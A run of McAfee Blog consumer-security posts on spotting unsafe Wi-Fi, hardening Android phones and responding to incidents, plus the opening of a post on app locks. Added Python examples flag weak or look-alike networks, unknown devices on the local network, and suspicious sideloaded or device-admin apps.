    It is, however, possible to protect your Wi-Fi from being hacked. In this article, we’ll walk you through some practical steps to stay protected when you connect, from recognizing dangerous networks to securing your home Wi-Fi. We’ll also show you what to do if you think you’ve been targeted.

    What is a wireless network attack?

    Wireless network attacks happen when cybercriminals target your Wi-Fi connection to steal your personal information. It is the digital equivalent of eavesdropping: attackers exploit weaknesses in your wireless connection to intercept the information you send and receive online.

    Criminals can intercept your login credentials as you type them, redirect you to legitimate-looking but fake websites, or even impersonate you online using stolen information. The goal is often wireless identity theft, that is, using your compromised data for financial fraud or other malicious purposes.

    The risks of unprotected Wi-Fi are particularly high because many wireless networks lack proper security measures. When you connect to an unsecured network, your data travels in a way that skilled attackers can capture and decode. This puts your banking information, social media accounts, work credentials, and personal communications at risk.

    Common wireless attacks include creating fake hotspots that mimic legitimate networks (known as evil twins), intercepting data on public Wi-Fi, and using specialized software to crack network passwords.

    Wi-Fi security weaknesses that enable hacking

    Cybercriminals usually circumvent wireless network security in several ways, including:

    • Outdated Wi-Fi encryption: Networks still using WEP or older WPA/WPA2 protocols without security updates create easy targets for wireless identity theft. For more stringent security, your router settings should indicate the more current WPA3 or the latest WPA2-AES encryption.
    • Weak default passwords: Many routers ship with simple default passwords like “admin” or “password123.” When you set up your home Wi-Fi router, make sure to change the router’s default network name and password to at least 12 characters that combine words, numbers, and symbols.
    • Default network names: Keeping your router’s default network name broadcasts your device model to potential attackers. Rename your network to something that doesn’t identify your router brand and model, nor your address or family name.
    • Rogue access points and evil twins: Cybercriminals can set up fake Wi-Fi networks that mimic legitimate ones to intercept your data and steal your identity.
    • Poorly configured guest networks: Guest networks without proper isolation can expose your main network and connected devices to hacking risks.
    • Outdated router firmware: Router manufacturers regularly release firmware updates to patch security vulnerabilities. Running outdated firmware leaves your network exposed to known threats.
    • Unsecured Internet of Things (IoT) devices: IoT home devices such as smart TVs, security cameras, voice assistants, and other smart appliances often have weak security settings and can serve as entry points for attackers seeking to compromise your network, especially if not isolated on a separate network.

    What hackers can do after hacking your Wi-Fi

    Once scammers gain access to your home or an unsecured public Wi-Fi network, they can launch several types of wireless attacks that directly put your personal information and financial security at risk.

    Credential theft and account takeovers

    One of the most common dangers is credential theft, where attackers intercept your login information as it travels over unsecured networks. When you check your email, log into social media, or access work accounts on a compromised Wi-Fi network, cybercriminals can capture your usernames and passwords. This wireless identity theft often leads to unauthorized access to your bank accounts, credit cards, and personal profiles.

    Session hijacking and traffic sniffing

    In session hijacking, attackers take over your current online activities on public Wi-Fi, then impersonate you on websites and services you’re logged into. This tactic is called the man-in-the-middle attack. They might apply for credit cards in your name, make purchases, or even commit crimes while pretending to be you. Through traffic sniffing, they can monitor all data flowing through the compromised networks, capturing everything from personal messages to financial information.

    Traffic redirection to fake sites

    Cybercriminals will also reroute your internet traffic to malicious websites that look similar to legitimate ones. You think you’re logging into your real bank website, but you’re actually entering your credentials into a scammer’s fake site. This technique, known as DNS poisoning, makes it nearly impossible to detect the deception until it’s too late.

    Malware installation

    The attackers will push malicious software directly onto your devices, enabling them to log every keystroke you make, steal stored passwords, access your files, and even quietly activate your camera or microphone without your knowledge.

    Device surveillance

    Hackers can monitor not only your device but all connected devices on your network. That means they can access your entire family’s browsing habits, private messages, stored photos and documents, and online activities, giving them detailed personal information for their identity theft schemes.

    These attacks directly affect your daily activities, from online banking to e-commerce shopping to working from home. Even simple tasks, such as checking social media, can result in identity theft when conducted over compromised networks.

    Actions to verify a secure wireless network

    You don’t have to avoid public Wi-Fi entirely. By being aware of these risks and taking appropriate precautions, you can significantly reduce your exposure to wireless identity theft. The protective measures we’ll explore in the following sections will show you how to recognize dangerous networks, browse safely, and maintain your privacy even when using public connections.

    • Look for the missing lock icon: In your Wi-Fi settings, secure networks display a lock symbol next to the network name. Networks without this icon are open and unencrypted, making your data vulnerable to anyone within range.
    • Avoid generic or suspicious network names: Be wary of networks with names like “Free WiFi,” “Public,” “Guest,” or random combinations of letters and numbers. Legitimate businesses typically use their brand name in their network identifier.
    • Question misspelled business names: If you’re at a Starbucks cafe but see a network called “Starbuckz” or “Starbucks_Free,” it could be a fake network designed to steal your information. Always verify the correct network name with the staff.
    • Check for HTTPS on captive portals: When connecting to public Wi-Fi that requires you to accept terms or log in through a web page, ensure the login page URL starts with “https://” and shows a lock icon in your browser’s address bar.
    • Be cautious in unfamiliar locations: Networks appearing in unexpected places, such as “Coffee Shop WiFi” in a residential area or multiple networks with similar names in one location may indicate malicious hotspots.
    • Verify encryption type: Right-click the network in your Wi-Fi list and navigate to Properties > Security type. A secure network will use WPA2 or WPA3 encryption, while “Open” or “WEP” indicates weak or no protection.
    • Heed certificate warnings: If your device displays security certificate errors or warnings when connecting to public Wi-Fi, take them seriously rather than clicking through. These alerts could indicate security risks or man-in-the-middle attacks.
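
The checks in this list (missing lock icon, weak encryption type, duplicate or look-alike network names) can be automated on a laptop that scans for networks. The script below is an added example, not McAfee's code: it parses the terse output of NetworkManager's `nmcli -t -f SSID,BSSID,SECURITY,SIGNAL dev wifi list` on Linux, flags open and WEP-only networks, and reports any SSID that is advertised with conflicting security settings, the evil-twin pattern described earlier. The field list, the security-string conventions and the sample scan in CONSTRUCTED_SCAN are this example's assumptions; the sample stands in for a real scan so the code runs without a wireless card.

```python
"""Flag open, WEP-only and possibly spoofed Wi-Fi networks from an nmcli scan.

Added example, not McAfee's code. It parses the terse output of
    nmcli -t -f SSID,BSSID,SECURITY,SIGNAL dev wifi list
(Linux NetworkManager). CONSTRUCTED_SCAN stands in for that output so the
script runs without a wireless card; live_scan() feeds a real scan instead.
"""
import re
import subprocess


def split_terse(line):
    """nmcli -t separates fields with ':' and escapes colons inside values as '\\:'
    (a BSSID contains five of them), so split only on unescaped colons."""
    return [f.replace("\\:", ":") for f in re.split(r"(?<!\\):", line)]


def parse_scan(text):
    """Turn terse nmcli lines into dicts; blank lines and short rows are skipped."""
    networks = []
    for line in text.splitlines():
        fields = split_terse(line.strip())
        if len(fields) < 4:
            continue
        ssid, bssid, security, signal = fields[:4]
        networks.append({"ssid": ssid or "<hidden>", "bssid": bssid.upper(),
                         "security": security.strip(), "signal": int(signal or 0)})
    return networks


def weakness(security):
    """Return why a security string is weak, or None if it is WPA2/WPA3."""
    if not security:
        return "open network, no encryption"
    if "WEP" in security:
        return "WEP encryption, broken for years"
    if "WPA1" in security and "WPA2" not in security and "WPA3" not in security:
        return "WPA1 only, outdated"
    return None


def assess(networks):
    """Report weak networks and SSIDs that appear with conflicting security settings."""
    weak = [(n["ssid"], n["bssid"], weakness(n["security"]))
            for n in networks if weakness(n["security"])]
    by_ssid = {}
    for n in networks:
        by_ssid.setdefault(n["ssid"], set()).add(n["security"] or "open")
    # One SSID advertised both encrypted and open (or with different schemes) is
    # the classic evil-twin pattern. Several BSSIDs with the *same* security is
    # normal for mesh systems and multi-AP venues, so that alone is not flagged.
    twins = sorted(s for s, secs in by_ssid.items() if len(secs) > 1)
    return {"weak": weak, "possible_twins": twins}


def live_scan():
    """Run the real nmcli command; returns [] if nmcli is unavailable."""
    try:
        out = subprocess.run(["nmcli", "-t", "-f", "SSID,BSSID,SECURITY,SIGNAL", "dev", "wifi", "list"],
                             capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return []
    return parse_scan(out)


# Constructed scan: a cafe network that appears both encrypted and open,
# a generic open hotspot, a healthy home network and an old WEP router.
CONSTRUCTED_SCAN = r"""
CoffeeShop:AA\:BB\:CC\:DD\:EE\:01:WPA2:82
CoffeeShop:DE\:AD\:BE\:EF\:00\:01::90
Free WiFi:12\:34\:56\:78\:9A\:BC::61
HomeNet:00\:11\:22\:33\:44\:55:WPA2 WPA3:70
OldRouter:66\:77\:88\:99\:AA\:BB:WEP:45
"""

if __name__ == "__main__":
    report = assess(parse_scan(CONSTRUCTED_SCAN))
    for ssid, bssid, why in report["weak"]:
        print(f"WEAK  {ssid} ({bssid}): {why}")
    for ssid in report["possible_twins"]:
        print(f"TWIN? {ssid}: seen with different security settings, verify with staff")
```

A "possible twin" result is a reason to confirm the network name with staff before connecting, exactly as the list above advises; it cannot tell which of the two access points is the genuine one.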

    Recognize and respond to a Wi-Fi hacking incident

    If you suspect your Wi-Fi network has been compromised, don’t panic. Recognizing the warning signs early and taking decisive action can protect your identity and restore your network security.

    The most common indicators of a compromised network include unexpected slowdowns in your internet speed, unfamiliar devices appearing on your network, and settings that have changed without your knowledge. You might also notice unusual data usage patterns, your router admin password no longer working, or being redirected to suspicious websites when browsing. When you detect these signs, take quick action.

    Immediate steps to take

    1. Immediately disconnect affected devices: As soon as you suspect a compromise, disconnect all devices from your Wi-Fi network to prevent further unauthorized access and limit potential damage from identity theft attempts.
    2. Change your router admin password first: Access your router’s admin panel and immediately update the administrator password to something strong and unique to block attackers from regaining access to your network settings.
    3. Update your Wi-Fi network password: Create a new, complex Wi-Fi password using a combination of letters, numbers, and symbols. Use at least 12 characters for wireless networks.
    4. Install the latest firmware updates: Check your router manufacturer’s website for recent firmware updates that patch security vulnerabilities.
    5. Review and remove unknown devices: Use your router’s device management features to identify and remove any unauthorized devices from your network’s allowed devices list.
    6. Enable WPA3 security if available: Upgrade to WPA3 encryption if your router supports it for enhanced protection from the wireless exploits that commonly affect older security protocols.
    7. Perform a factory reset if necessary: If you cannot identify the source of the compromise or if multiple security indicators persist, reset your router to factory defaults and reconfigure it with strong security settings.

    Ongoing safeguards against Wi-Fi hacking

    1. Change your router’s admin and Wi-Fi passwords regularly: Your router’s default credentials are often publicly available online, making them easy targets for wireless identity theft. Create strong, unique passwords for both your router’s admin panel and Wi-Fi network. Update them every 3-6 months and immediately if you suspect any unauthorized access.
    2. Disable WPS (Wi-Fi Protected Setup) on your router: WPS creates a convenient backdoor that hackers can exploit through brute-force attacks. Access your router’s admin panel and turn off WPS completely. This simple step closes a major vulnerability that wireless exploits often target.
    3. Set up a separate guest network for visitors and IoT devices: Isolating your main devices from guest access and smart home gadgets reduces the risks of unprotected Wi-Fi spreading throughout your network. Configure guest network access with time limits and bandwidth restrictions to maintain better control over your network security.
    4. Turn off SSID QR code sharing and disable automatic network sharing: Many modern devices offer convenient network sharing through QR codes or automatic syncing, but these features can inadvertently expose your credentials. Disable these options in your device settings and share Wi-Fi access manually when needed.
    5. Properly wipe devices before selling, donating, or disposing of them: Your old devices store Wi-Fi passwords and network configurations that could compromise your security long after disposal. Perform factory resets and use secure wiping tools to ensure all saved network credentials are completely removed from the device’s memory.
    6. Review and manage your cloud backup settings: Cloud services often sync Wi-Fi passwords and network settings across devices, which can create unexpected security risks. Check your iCloud, Google, or Microsoft account settings to control which network information gets backed up and shared between your devices.
    7. Keep your router firmware updated and monitor connected devices: Manufacturers regularly release security patches to address newly discovered vulnerabilities. Enable automatic firmware updates when possible, and regularly review your router’s connected devices list to spot any unauthorized access attempts that could lead to wireless identity theft.
    8. Monitor your network regularly: Set up ongoing monitoring through your router’s logging features or third-party network monitoring tools to detect future unauthorized access attempts and maintain awareness of your network’s security status.
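
"Unfamiliar devices appearing on your network" is the indicator that is easiest to check with a script, and items 7 and 8 above both ask for exactly that. The example below is added here and is not McAfee's code: it reads the neighbour (ARP) table that `ip neigh show` prints on Linux, maps each learned MAC address to the addresses it answered for, reports any MAC that is not on a known-device list, and compares two snapshots so that newcomers stand out. The allowlist in KNOWN_DEVICES and the table in SAMPLE_NEIGH are constructed for the demonstration.

```python
"""Spot devices on the home network that are not on your known-device list.

Added example, not McAfee's code. It parses `ip neigh show` (Linux) output,
flags MAC addresses missing from KNOWN_DEVICES and diffs two snapshots.
SAMPLE_NEIGH and KNOWN_DEVICES are constructed; on a real network you would
fill KNOWN_DEVICES from your router's client list and run this on a schedule.
"""
import subprocess

# Constructed allowlist: MAC address -> friendly name (your own inventory)
KNOWN_DEVICES = {
    "00:11:22:33:44:55": "router",
    "aa:bb:cc:dd:ee:01": "laptop",
    "aa:bb:cc:dd:ee:02": "phone",
}

# Constructed `ip neigh show` output; the FAILED entry has no MAC and is ignored
SAMPLE_NEIGH = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.20 dev wlan0 lladdr AA:BB:CC:DD:EE:01 STALE
192.168.1.37 dev wlan0 lladdr 0c:9d:92:aa:bb:cc REACHABLE
192.168.1.50 dev wlan0  FAILED
fe80::211:22ff:fe33:4455 dev wlan0 lladdr 00:11:22:33:44:55 router REACHABLE
"""


def parse_neigh(text):
    """Return {mac: sorted list of addresses} from ip-neigh style lines."""
    seen = {}
    for line in text.splitlines():
        parts = line.split()
        if "lladdr" not in parts:
            continue  # incomplete or failed entry, no hardware address learned
        mac = parts[parts.index("lladdr") + 1].lower()  # normalise case for matching
        seen.setdefault(mac, set()).add(parts[0])
    return {mac: sorted(addrs) for mac, addrs in seen.items()}


def find_unknown(neigh, known):
    """List (mac, addresses) for every MAC absent from the allowlist."""
    return sorted((mac, addrs) for mac, addrs in neigh.items() if mac not in known)


def diff_snapshots(previous, current):
    """MACs that appeared or disappeared between two parse_neigh() results."""
    return {"new": sorted(set(current) - set(previous)),
            "gone": sorted(set(previous) - set(current))}


def live_neigh():
    """Read the real table; returns {} where `ip` is not available."""
    try:
        out = subprocess.run(["ip", "neigh", "show"], capture_output=True, text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        return {}
    return parse_neigh(out)


if __name__ == "__main__":
    table = parse_neigh(SAMPLE_NEIGH)
    for mac, addrs in find_unknown(table, KNOWN_DEVICES):
        print(f"UNKNOWN device {mac} at {', '.join(addrs)}")
    # Compare against an earlier snapshot in which only the phone was seen
    changes = diff_snapshots({"aa:bb:cc:dd:ee:02": ["192.168.1.21"]}, table)
    for mac in changes["gone"]:
        print(f"{KNOWN_DEVICES.get(mac, mac)} no longer present")
```

Two caveats for real use: the neighbour table only lists devices that have recently exchanged traffic with the machine running the script, so the router's own client list is the more complete source; and modern phones randomize their MAC address per network, so the allowlist must hold the address the phone uses on your network, not the one printed on its box.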

    If you must connect to public Wi-Fi

    • Use your cellular hotspot instead: Your phone’s mobile data connection is far more secure than any public Wi-Fi network. Enable hotspot mode and connect your laptop or tablet to avoid the risks of unprotected Wi-Fi entirely.
    • Enable HTTPS-only mode in your browser: In Chrome, go to Settings > Privacy and Security > Security and enable “Always use secure connections.” For Firefox, visit Settings > Privacy & Security and check “HTTPS-Only Mode.” This prevents wireless attacks that intercept unencrypted traffic.
    • Configure DNS encryption: Use secure DNS services like Cloudflare (1.1.1.1) or Quad9 (9.9.9.9) in your device settings. On Windows, go to Settings > Network & Internet > Advanced network settings > Change adapter options, then configure DNS servers in your connection properties.
    • Disable automatic Wi-Fi connections: On iOS, go to Settings > Wi-Fi and turn off “Auto-Join” for public networks. On Android, navigate to Settings > Network & internet > Wi-Fi > Wi-Fi preferences and disable “Connect to open networks.” This prevents automatic connecting to potentially dangerous networks.
    • Enable multi-factor authentication and use passkeys: Protect your accounts with MFA through apps like Google Authenticator or Microsoft Authenticator. When available, choose passkeys over passwords, which are more resistant to phishing and man-in-the-middle attacks.
    • Avoid sensitive tasks on public Wi-Fi: Never access banking, make financial transactions, or log into administrative accounts while connected to public networks. Save these activities for your secure home network or use your cellular data connection instead.
    • Forget networks after use: Always remove public Wi-Fi networks from your saved connections when you leave. On your device’s Wi-Fi settings, select the network and choose “Forget” or “Remove” to prevent automatic reconnection to potentially compromised networks.
    • Verify network authenticity: Before connecting, confirm the exact network name and password with venue staff. Attackers often create fake networks with similar names, such as “Free_WiFi” or “Hotel_Guest,” to capture your data.
    • Keep your device updated: Install security updates promptly on all devices. These patches often fix vulnerabilities that could be exploited on public networks, helping you stay protected.
    • Use a reputable VPN service: When you must use public Wi-Fi, connect through a trusted virtual private network to encrypt all your traffic and create a secure tunnel that protects your data even on compromised networks.

    Final thoughts

    To guard your network or device from hacking attempts, take action today by updating your router’s firmware and passwords, reviewing and removing unnecessary saved networks from your devices, and enabling multi-factor authentication on all your important accounts. These small, but consistent steps will deliver tangible benefits to your daily digital activities.

    For better security, subscribe to an identity theft protection service such as McAfee+, which offers proactive identity surveillance, lost wallet protection, and alerts when suspicious activity is detected on your accounts. All things considered, the investment in these security measures is minimal compared to the peace of mind they provide.

    The post Verify Secure Wireless Networks to Prevent Identity Theft appeared first on McAfee Blog.

    Guard Your Android Phones Against Loss of Data and Infected Apps

    By: McAfee

    Because Android uses an open source operating system, it usually gets a bad rap for being vulnerable to data loss and compromised apps as a result of malware, insecure app coding, unprotected cloud storage, outdated software, sideloading from untrusted sources, and even specific website vulnerabilities. Suffice it to say that any of these risks can be destructive and costly.

    While Google addresses specific vulnerabilities, cyberthreats continue to evolve as criminals become more scheming or desperate. For these reasons, it is still best to exercise caution to protect the data on your device. In this article, we will share vital tips on how you can secure your device.

    Essential tips for Android security

    Determining if you’re vulnerable isn’t always easy. There are, however, some measures you can take to protect your device.

    Keep your Android OS and security patches updated

    Your first line of defense against Android vulnerability threats is maintaining current software. Android security patches fix security weaknesses that cybercriminals actively take advantage of to access your personal data, install malware, or take control of your device. When you delay updates, you leave known security gaps open for attackers to exploit.

    To enable automatic updates, navigate to Settings > System > System update > Advanced settings, then toggle on “Automatic system updates.” For Google Pixel devices, security updates typically arrive monthly, while other manufacturers may have varying schedules.

    On top of this, set your Google Play Store to auto-update apps by opening the Play Store, tapping your profile picture, going to Settings > Network preferences > Auto-update apps, and selecting “Over any network” if you have unlimited data or “Over Wi-Fi only” to preserve your data plan.

    Install apps only from Google Play Store and verify developer permissions

    One of the most effective Android phone security best practices is restricting app installations to the Google Play Store. Sideloading apps from unknown sources significantly increases your risk of installing malware, spyware, or apps with hidden malicious functionality.

    Before installing any app, examine the permissions it requests. Apps asking for excessive permissions should raise your suspicions. Navigate to Settings > Apps > Special app access > Install unknown apps and ensure all toggles are disabled.

    In addition, choose apps with consistent positive ratings and active developer responses to user concerns. Google’s Play Console policies provide guidelines for safe app development, but your vigilance remains essential.

    Enable Google Play Protect and Safe Browsing in Chrome

    Google Play Protect scans over 125 billion apps daily for malware and policy violations. While not perfect, this automated screening catches the majority of malicious apps before they reach your device, and even detects them after installation. In contrast, apps outside this ecosystem lack this protection layer.

    Activate Play Protect by opening Google Play Store, tapping your profile picture, selecting “Play Protect,” and ensuring both “Scan apps with Play Protect” and “Improve harmful app detection” are enabled. This service runs automatic security scans and can remove or disable harmful apps even after you’ve installed them.

    For comprehensive, real-time protection against phishing sites, malware downloads, and suspicious web content, enable safe browsing Android features in Chrome. Open Chrome, tap the three dots menu, go to Settings > Privacy and security > Safe Browsing, and select “Enhanced protection.” This setting checks URLs against Google’s constantly updated database of dangerous sites.

    Use strong screen lock, biometric authentication, and 2FA

    Modern Android devices offer multiple authentication methods, and using them strategically provides layered security for your most sensitive information. Set up a strong screen lock by going to Settings > Security > Screen lock and choosing either a complex PIN with at least 6 digits, a pattern with at least 6 points, or a password that combines letters, numbers, and symbols.

    Enable biometric authentication, whether fingerprint and/or facial recognition, as an additional layer, but always maintain a strong backup PIN or password since biometrics can be circumvented.

    For critical applications containing sensitive data such as banking apps, password managers, email clients, and social media, enable two-factor authentication (2FA) where possible for extra security.

    Enable automatic cloud backups and device encryption

    Android’s built-in backup and encryption features provide essential protection against data loss from device theft, hardware failure, malware attacks, or accidental deletion, forming a crucial part of your Android incident response strategy.

    Enable automatic backups of your app data, call history, and device settings by navigating to Settings > System > Backup, then toggle on “Back up to Google Drive.” You can set the frequency to daily. For photos and videos, enable Google Photos backup with high-quality or original quality settings based on your storage plan.

    Device encryption can be activated through Settings > Security > Encryption & credentials > Encrypt phone. Modern Android devices (Android 6.0+) typically have encryption enabled by default, but you will need to verify this setting. Google’s Android backup service documentation provides detailed information on what data is protected and how to manage your backup settings effectively.

    Set up Google account recovery options

    Your Google account serves as the master key to most Android functionality, so having an account recovery system can be invaluable to restore access to your device when local authentication methods fail. To ensure your recovery information is current, visit Security settings on your account profile, add a secondary email address that you can access independently, but avoid using another Gmail account as your backup. Include a mobile phone number for SMS verification, and consider adding multiple phone numbers if you frequently travel or change devices.

    Google also provides one-time-use back-up codes that can restore account access when other methods fail. Download these codes and store them securely offline. Consider using a password manager like Google’s built-in option or a reputable third-party solution. Never store recovery codes in easily accessible digital formats like unencrypted text files or photos on the same device.

    Configure Find My Device for remote management

    Google’s Find My Device service provides powerful remote management capabilities that can prevent permanent data loss during Android vulnerability situations or lockout scenarios. This service allows you to locate, lock, or completely erase your device remotely.

    To enable this feature, navigate to Find My Device through Settings > Security > Find My Device. Ensure that your location services remain active for this feature to function properly.

    Take note that when you decide to remotely erase your data from your device, this feature completely wipes all local data but preserves the information you backed up to Google’s cloud services. Only use this option when you’re certain your back-up systems are current.

    Implement comprehensive backup strategies

    Android offers multiple backup solutions that transform potential data disasters into minor inconveniences. To store your photos, videos, SMS messages, and call logs, you can go to Settings > System > Backup and choose the frequency that matches your usage patterns: daily backups for heavy users, weekly for lighter usage.

    For sensitive information that you would like to access even when offline, you might want to consider periodic local backups by connecting your device to a computer monthly and copying important files manually. Test your systems regularly by attempting to restore a small amount of data to ensure your backups work when needed and identify any gaps in your protection strategy.

    Mobile incident response for Android

    A mobile security incident can escalate from a nuisance to real damage in minutes, especially if an attacker can access your accounts, intercept messages, or install persistent apps. Speed matters when you respond, especially when prioritizing the high-impact steps that will stop the bleeding, regain control, and protect your data before you move on to cleanup and recovery. The actions below follow that order, so you can respond calmly and effectively even under stress.

    1. Disconnect from untrusted networks immediately: Turn off Wi-Fi and mobile data instantly to prevent unauthorized access to your accounts or further data theft. Switch to airplane mode if you suspect active malware communication. Once disconnected, you can assess the situation and secure your device and accounts.
    2. Use Find My Device to secure your device remotely: From a trusted computer or another device, go to Google’s Find My Device and lock your smartphone with a new passcode, display a message with contact information, or completely erase the device if necessary.
    3. Change critical account passwords and enable MFA: From a trusted device, immediately update your passwords for critical accounts linked to your phone such as email, banking, social media, and other services containing personal or financial information. Add authentication methods where available and document which passwords were changed to avoid confusion later.
    4. Review and remove suspicious apps and permissions: Review every installed app under Settings > Apps and uninstall any you don’t recognize or trust. The Play Store’s own list (your profile icon > Manage apps & device) only shows apps installed through the Play Store, so sideloaded apps will not appear there. If an app refuses to uninstall, check Device admin apps (under Settings > Security; the path varies by Android version) and deactivate it there first, since malware often registers as a device administrator to resist removal. Next, open the Permission manager (under Settings > Privacy or Settings > Security & privacy) and revoke unnecessary access to location, camera, microphone, contacts, and SMS. Pay particular attention to Settings > Accessibility: an enabled accessibility service can read the screen and inject taps, which is how many Android banking trojans operate.
    5. Update your operating system: Ensure your device is running the latest version of its operating system by going to Settings > System > System update and enable automatic updates. Also update your installed apps by downloading new versions on your device’s app store. If your device is older and no longer receives security updates, consider upgrading to a supported model.
    6. Factory reset and restore from a known-good backup: If you suspect malware, restoring a backup on top of the infected device is not enough. Perform a factory reset (Settings > System > Reset options) and then restore from a backup taken before the security incident occurred. A word of caution: this will remove any data created after the backup date, so weigh the security benefits against potential data loss.
    7. File appropriate reports with relevant authorities: Document the incident and report it to the appropriate authorities. If you suspect SIM swapping or carrier-related fraud, contact your mobile carrier immediately. Report identity theft to the Federal Trade Commission at IdentityTheft.gov and internet-enabled crime to the FBI’s Internet Crime Complaint Center (IC3). For incidents involving financial accounts, contact your bank, credit card company, and the major credit bureaus.
    8. Monitor accounts and set up security alerts: Continue monitoring your accounts to detect any lingering effects of the security incident and prevent future compromises. Enable account activity notifications for all critical services, consider using a credit monitoring service, and review your credit reports regularly for unauthorized accounts or inquiries. Set up Google Alerts for your name and other personal information to catch potential identity theft attempts.
    9. Get a mobile security solution: As Android devices become increasingly central to our lives, protecting them with a comprehensive mobile security solution has become essential. A robust mobile security app works continuously to identify and neutralize threats before they can compromise your device or steal your data.
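    The app-and-permission review in step 4 is easier to do rigorously from a trusted computer over adb than by tapping through menus. The following Python script is added here as an example and is not part of the original article: it parses the output of three adb commands (`pm list packages -3 -i`, `settings get secure enabled_accessibility_services`, `dumpsys device_policy`) and flags the three things that matter most during triage: third-party apps not installed from Google Play, third-party apps with an enabled accessibility service, and apps registered as device administrators. The sample outputs embedded in it are constructed, and the real `dumpsys` layout changes between Android releases, so only the `ComponentInfo{...}` tokens are relied on.

```python
"""Triage helper for the app review step: flag third-party apps that were not
installed from Google Play, that have an enabled accessibility service, or that
are registered as device admins. Parses the output of three adb commands:

  adb shell pm list packages -3 -i
  adb shell settings get secure enabled_accessibility_services
  adb shell dumpsys device_policy

The sample outputs below are constructed for this example.
"""
import re

# Installer package names that count as Google Play; anything else is treated
# as sideloaded (manual APK install, browser download, a third-party store).
PLAY_STORE_INSTALLERS = {"com.android.vending"}

# Constructed sample of `pm list packages -3 -i`.
SAMPLE_PACKAGES = """\
package:com.whatsapp  installer=com.android.vending
package:com.bank.mobile  installer=com.android.vending
package:com.example.freegift  installer=null
package:com.example.sysupdate  installer=com.android.packageinstaller
"""

# Constructed sample of `settings get secure enabled_accessibility_services`
# (colon-separated package/service pairs).
SAMPLE_ACCESSIBILITY = (
    "com.example.sysupdate/com.example.sysupdate.OverlayService:"
    "com.google.android.marvin.talkback/.TalkBackService"
)

# Constructed excerpt of `dumpsys device_policy`. Its layout varies by Android
# release, so only the ComponentInfo{...} tokens are parsed.
SAMPLE_DEVICE_POLICY = """\
Current Device Policy Manager state:
  Enabled Device Admins (User 0, provisioningState: 0):
    ComponentInfo{com.example.freegift/com.example.freegift.AdminReceiver}:
      uid=10234
"""


def parse_packages(text):
    """Return {package_name: installer} from `pm list packages -i` output."""
    result = {}
    for line in text.splitlines():
        m = re.match(r"package:(\S+)\s+installer=(\S+)", line.strip())
        if m:
            result[m.group(1)] = m.group(2)
    return result


def sideloaded(packages):
    """Packages whose installer is not Google Play (sorted for stable output)."""
    return sorted(p for p, inst in packages.items() if inst not in PLAY_STORE_INSTALLERS)


def parse_accessibility(value):
    """Package names with an enabled accessibility service."""
    value = value.strip()
    if not value or value == "null":
        return []
    return [entry.split("/")[0] for entry in value.split(":") if entry]


def parse_device_admins(text):
    """Package names that appear as ComponentInfo{pkg/receiver} in the dump."""
    return sorted({m.split("/")[0] for m in re.findall(r"ComponentInfo\{([^}]+)\}", text)})


def triage(packages_text, accessibility_value, device_policy_text):
    """Map each suspicious third-party package to the list of reasons it was flagged."""
    packages = parse_packages(packages_text)
    findings = {}
    for pkg in sideloaded(packages):
        findings.setdefault(pkg, []).append(
            "not installed from Google Play (installer=%s)" % packages[pkg])
    for pkg in parse_accessibility(accessibility_value):
        if pkg in packages:  # third-party only; preinstalled services like TalkBack are ignored
            findings.setdefault(pkg, []).append("has an enabled accessibility service")
    for pkg in parse_device_admins(device_policy_text):
        if pkg in packages:
            findings.setdefault(pkg, []).append(
                "is an active device admin (deactivate before uninstalling)")
    return findings


if __name__ == "__main__":
    for pkg, reasons in triage(SAMPLE_PACKAGES, SAMPLE_ACCESSIBILITY, SAMPLE_DEVICE_POLICY).items():
        print(pkg)
        for reason in reasons:
            print("  -", reason)
```

    Run the three commands with `adb shell` and pass their output to `triage()`. A package that comes back with two findings, as `com.example.freegift` does in the sample, is the one to remove first, and it must be deactivated under Device admin apps before Android will let you uninstall it.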

    Key capabilities of a reliable mobile security solution

    When evaluating mobile security solutions for your Android device, focus on apps that offer comprehensive protection across multiple threat vectors. The most effective solutions combine several key capabilities into a single, user-friendly platform that doesn’t slow down your device or drain your battery.

    • Web protection and safe browsing: Safe browsing protection has become increasingly important as cybercriminals focus on phishing attacks and malicious websites that exploit smartphone vulnerabilities. Your mobile security solution should work seamlessly with your preferred browser, whether that’s Chrome, Firefox, or another popular option.
    • Wi-Fi security and network protection: Your security app should be able to monitor and check for signs of compromise and malicious hotspots, and alert you to networks attempting to intercept your data. It should also have virtual private network capabilities, encrypting your internet traffic even when connected to potentially unsafe networks to ensure that even if your connection is intercepted, your actual data remains unreadable to attackers.
    • Identity monitoring and privacy protection: A trusted security solution will include robust identity monitoring features that detect signs of unauthorized use of your personal information. Comprehensive identity monitoring encompasses credit monitoring and surveillance of the dark web, social media platforms, and data broker sites.

    Final thoughts

    Your Android device holds your most precious digital memories, important work files, and personal information, making it a prime target for cybercriminals who continue to exploit new vulnerabilities. While threats like remote factory resets and malicious web attacks can disrupt your daily digital routine, you do have the power to protect yourself against them by keeping your OS and security patches current, enabling Google Play Protect and built-in safe browsing features, maintaining regular backups of your essential data, and considering a comprehensive mobile security solution that provides real-time protection. For additional steps to safeguard your Android mobile life, visit McAfee’s security best practices.

    The post Guard Your Android Phones Against Loss of Data and Infected Apps appeared first on McAfee Blog.

    App Locks Can Improve the Security of Your Mobile Phones

    By: McAfee

    The practice of locking our possessions is relevant in every aspect of our modern lives. We physically lock our houses, cars, bikes, hotel rooms, computers, and even our luggage when we go to the airport. There are lockers at gyms, schools, amusement parks, and sometimes even at the workplace.

    Digitally, we lock our phones with passcodes and protect them from malware with a security solution. Why, then, don’t we lock the individual apps that house some of our most personal and sensitive data?

    From photos to emails to credit card numbers, our mobile apps hold invaluable data that is often left unprotected, especially given that some of the most commonly used apps on the Android platform such as Facebook, LinkedIn and Gmail don’t necessarily require a log in each time they’re launched.

    Without an added layer of security, those apps are leaving room for nosy family members, jealous significant others, prankster friends, and worst of all thieves to hack into your social media or email accounts at the drop of a hat. In this article, we will discuss what an app lock is, everyday scenarios you may need it, and how to set it up on your smartphone.

    Your apps hold details of your life

    Your mobile phone is more than just a gadget. It’s your wallet, camera, diary, and connection to the world. You likely keep photos, messages, social media, payment apps, and even confidential work files on it. To protect these bits of personal information, we use PINs, patterns, or biometrics to lock our devices, but once the phone is open, every app is fair game.

    If someone were able to get past your phone’s lock screen and gain access to the information on your phone, how much of your life could they see? A friend could scroll through your photos. Your child could open your shopping app and make purchases. Or a thief could get into your banking and social media accounts in seconds.

